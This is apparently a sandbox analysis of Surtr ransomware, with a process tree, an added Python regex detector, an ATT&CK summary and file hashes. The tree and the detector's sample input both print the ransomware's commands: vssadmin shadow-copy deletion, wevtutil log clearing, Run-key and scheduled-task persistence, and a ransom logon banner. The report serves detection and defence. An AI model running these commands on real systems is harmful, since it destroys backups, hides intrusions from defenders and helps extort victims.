C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PrivateData_0r6fjlh4j8u4ts.surt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R /S "C:\ProgramData\Service"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"2⤵
- Drops startup file
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe sl Security /e:false2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe sl Security /e:false3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f2⤵
-
C:\Windows\system32\reg.exe (tree depth 3): reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
-
C:\Windows\System32\cmd.exe (tree depth 2): "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
-
C:\Windows\system32\reg.exe (tree depth 3): reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"
-
C:\Windows\SysWOW64\attrib.exe (tree depth 3): attrib +h +s "C:\ProgramData\Service\Surtr.exe"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c attrib +h +s "%TEMP%\Service\Surtr.exe"
-
C:\Windows\SysWOW64\attrib.exe (tree depth 3): attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
-
C:\Windows\SysWOW64\attrib.exe (tree depth 3): attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
-
C:\Windows\SysWOW64\attrib.exe (tree depth 3): attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
-
C:\Windows\SysWOW64\attrib.exe (tree depth 3): attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c attrib +h C:\ProgramData\Service\SurtrIcon.ico
-
C:\Windows\SysWOW64\attrib.exe (tree depth 3): attrib +h C:\ProgramData\Service\SurtrIcon.ico
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
-
C:\Windows\SysWOW64\reg.exe (tree depth 3): reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
-
C:\Windows\SysWOW64\reg.exe (tree depth 3): reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
-
C:\Windows\SysWOW64\reg.exe (tree depth 3): reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
-
C:\Windows\SysWOW64\reg.exe (tree depth 3): reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
- Modifies registry class
-
C:\Windows\System32\cmd.exe (tree depth 2): "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
-
C:\Windows\system32\vssadmin.exe (tree depth 3): vssadmin.exe Delete Shadows /all /quiet
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe (tree depth 2): C:\Windows\system32\cmd.exe /c cls
-
C:\Windows\system32\vssvc.exe (tree depth 1): C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe (tree depth 1): "C:\Windows\system32\wbengine.exe"
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exe (tree depth 1): C:\Windows\System32\vdsldr.exe -Embedding
-
C:\Windows\System32\vds.exe (tree depth 1): C:\Windows\System32\vds.exe
- Checks SCSI registry key(s)
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe (tree depth 1): "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exe (tree depth 1): C:\Windows\system32\svchost.exe -k wusvcs -p
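The process tree above is a compact record of what Surtr does after encryption: sets a pre-logon ransom banner and OEM string through reg.exe, hides its dropped copies and wallpaper with attrib +h +s, registers the .surtr extension (HKCR\.surtr and FileExts\.surtr\UserChoice) with a custom DefaultIcon, and deletes shadow copies via vssadmin. Every behaviour is launched twice, once as a cmd.exe /c wrapper and once as the child, so naive per-process counting doubles the numbers. The following detector is an added example, not part of the sandbox report or of the Surtr sample: the tags and regexes are my own assumptions, generalised beyond the .surtr case (any extension, any icon path, legalnoticecaption as well as legalnoticetext), and the sample input is constructed from the command lines above with the long banner text abbreviated.

```python
"""Tag Windows process-creation command lines with the post-encryption behaviours
seen in the Surtr process tree. Added example; rule names and patterns are my own."""
import re
from collections import Counter
from typing import Dict, List, Set

# Detection rules: (tag, regex over the full command line). Generalised past .surtr.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("ransom_logon_banner",  # legalnoticetext/caption is shown before every logon
     re.compile(r"\breg(\.exe)?\s+add\b.*\\Policies\\System\b.*\blegalnotice(text|caption)\b", re.I)),
    ("oem_branding_tamper",  # 'Manufacturer' string in System properties
     re.compile(r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\OEMInformation\b", re.I)),
    ("file_association_hijack",  # HKCR\.<ext>, FileExts\.<ext>, or a DefaultIcon for the new ProgId
     re.compile(r"\breg(\.exe)?\s+(add|delete)\b.*"
                r"((HKEY_CLASSES_ROOT|HKCR)\\\.[a-z0-9]+|\\FileExts\\\.[a-z0-9]+|\\DefaultIcon\b)", re.I)),
    ("hide_dropped_file",  # attrib +h (+s) on a freshly written payload
     re.compile(r"\battrib(\.exe)?\b.*\+h\b", re.I)),
    ("startup_folder_artifact",
     re.compile(r"\\Start Menu\\Programs\\Start-?Up\\", re.I)),
]

# A leading `cmd.exe /c ` wrapper, quoted or not, with or without a directory prefix.
WRAPPER = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/c\s+', re.I)

# Constructed sample input: command lines from the process tree above, banner text
# abbreviated, plus two benign lines (cls, svchost) as controls.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Files encrypted. Find SURTR_README." /f',
    r'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Files encrypted. Find SURTR_README." /f',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f',
    r'C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"',
    r'attrib +h +s "C:\ProgramData\Service\Surtr.exe"',
    r'attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"',
    r'reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f',
    r'reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f',
    r'reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f',
    r'"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet',
    r'vssadmin.exe Delete Shadows /all /quiet',
    r'C:\Windows\system32\cmd.exe /c cls',
    r'C:\Windows\system32\svchost.exe -k wusvcs -p',
]


def classify(cmdline: str) -> Set[str]:
    """Return the set of behaviour tags whose rule matches this command line."""
    return {tag for tag, rx in RULES if rx.search(cmdline)}


def inner_command(cmdline: str) -> str:
    """Strip a leading `cmd.exe /c` so a wrapper and its child process compare equal."""
    return WRAPPER.sub("", cmdline.strip(), count=1)


def triage(cmdlines: List[str]) -> Dict[str, object]:
    """Tag every line, collapse wrapper/child duplicates onto the inner command, and
    count each behaviour once per distinct command rather than once per process."""
    flagged: Dict[str, Set[str]] = {}
    for line in cmdlines:
        tags = classify(line)
        if tags:
            flagged.setdefault(inner_command(line), set()).update(tags)
    counts = Counter(tag for tags in flagged.values() for tag in tags)
    return {"flagged": flagged, "counts": counts}


def ransomware_indicators_present(counts: Counter) -> bool:
    """Shadow-copy deletion plus at least two other distinct behaviours. This threshold
    is an assumption for the example; tune it for your own telemetry."""
    return counts["shadow_copy_deletion"] > 0 and len(counts) >= 3


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINES)
    for cmd, tags in result["flagged"].items():
        print(f"{sorted(tags)}  {cmd[:80]}")
    print("counts:", dict(result["counts"]))
    print("ransomware-like:", ransomware_indicators_present(result["counts"]))
```

On the sample above the wrapper collapse reduces 11 flagged processes to 8 distinct commands; the file-association rule fires three times (FileExts delete, HKCR\.surtr add, DefaultIcon add), which is the same count the ATT&CK matrix below reports under Modify Registry. In production, feed it Sysmon event 1 or Windows 4688 command lines; the rules deliberately do not anchor on the "surtr" string so a rebuilt sample with a different extension still trips them.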
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
- Hidden Files and Directories (1)
Defense Evasion
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- Modify Registry (3)
- Indicator Removal on Host (1)
- File Deletion (3)
- Hidden Files and Directories (1)
Downloads
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe
MD5: 664cf36657bf55f20cac44505d3bbb2c
SHA1: a48f8089455201895757503255d0f573ce5d3c66
SHA256: 4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA512: 42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
-
C:\ProgramData\Service\ID_DATA.surt
MD5: 6a9c4d683eb1fd05b1e465f85f6e330d
SHA1: 790812841eb765ae2b652870e94a0228bb0f87c8
SHA256: 576215c8df54d9bf4b24893b858d944b865c70c69c5b44c4e4bb9ba7b4da3934
SHA512: af32822511e114affbdce6f2cabbdb0093f9eebad35f118106bc1a56f780d542a406e8c6321adc83359dc5ab25b4e9f6301c32de2bc0c3b37c0976e3ae84d7ce
-
C:\ProgramData\Service\PrivateData_0r6fjlh4j8u4ts.surt
MD5: ff2c8ac371eb8b2045f804aecf15ce48
SHA1: 04b49c0f8ed9a82b0af16d6db02a65564c4303d1
SHA256: e9b3a98e0faec2b5df4aec83f18e70af067a215e1559431679b2c21209350936
SHA512: fe950c9ad7d85c301c49e9b50bc80873697029b3ce982b0ace49d3e27dfd111e2274aecc28aa447ad19eb98e61411f137857d180f2b3f4eea08e73495fb986ce
-
C:\ProgramData\Service\PublicData_0r6fjlh4j8u4ts.surt
MD5: 76f1be0a10ef76babfb5cf1a236aba51
SHA1: 7994d2552916faddc5da25b91f4f1a67227a2ca6
SHA256: 390334635beee3ed19baaf68f5270b84c8ebe7b27c9afe578b2fac614944a3e1
SHA512: e8484a43700ddd5f6c5f0c74a09cfeb38cad9d4e3b7624ae6afbddbeba66a6d2603c2590691f5d3cd03975950e6b39393823022606a1939c82894301a76b3d11
-
C:\ProgramData\Service\SURTR_README.hta
MD5: 0cf4fbd6b2d441cfa231fa5ebe768595
SHA1: 6395154e01920d200d15e49d6671a0bd47515361
SHA256: 4897e7b2d16870416c2c0bfc3e5da1e0cba52945c34f6d60a56220dceb6bd616
SHA512: 1c9c1a57d43f1ce350797e8ba7d2bf07c2e29c93c76ecb1095d850cbe37c7a9665ca100c0dc858e079383763301bdd51f7d106728aa1aeaf3ef1ebee5c1176b7
-
C:\ProgramData\Service\SURTR_README.txt
MD5: d91dfe6ec91080570aa9d347d4554248
SHA1: ecff8162a6b9cc6e93526c673977d95d491cfacd
SHA256: 11ab8837863ed5ae2063446dad6279eb5ec52de6f3c23b65449b5033715419e5
SHA512: 63c421e4f4e1f14a2b23ad36178402183a882ca63d7b9618aa17146a8deb3e1e2985f788c3b3aa51b7a5968f777c6fa0fdd10e6e46668c2bb7f54c3d03f39fa7
-
C:\ProgramData\Service\Surtr.exe
MD5: 664cf36657bf55f20cac44505d3bbb2c
SHA1: a48f8089455201895757503255d0f573ce5d3c66
SHA256: 4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA512: 42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
-
C:\ProgramData\Service\SurtrBackGround.jpg
MD5: 33f7fc301be9d39fcb474fb8b1e5f42e
SHA1: a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA256: 99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA512: 6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
C:\ProgramData\Service\SurtrIcon.ico
MD5: 3257eb22824b57fe3d58074bca3128d3
SHA1: 6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA256: 5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA512: 7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe
MD5: 664cf36657bf55f20cac44505d3bbb2c
SHA1: a48f8089455201895757503255d0f573ce5d3c66
SHA256: 4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA512: 42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe
MD5: 664cf36657bf55f20cac44505d3bbb2c
SHA1: a48f8089455201895757503255d0f573ce5d3c66
SHA256: 4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA512: 42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735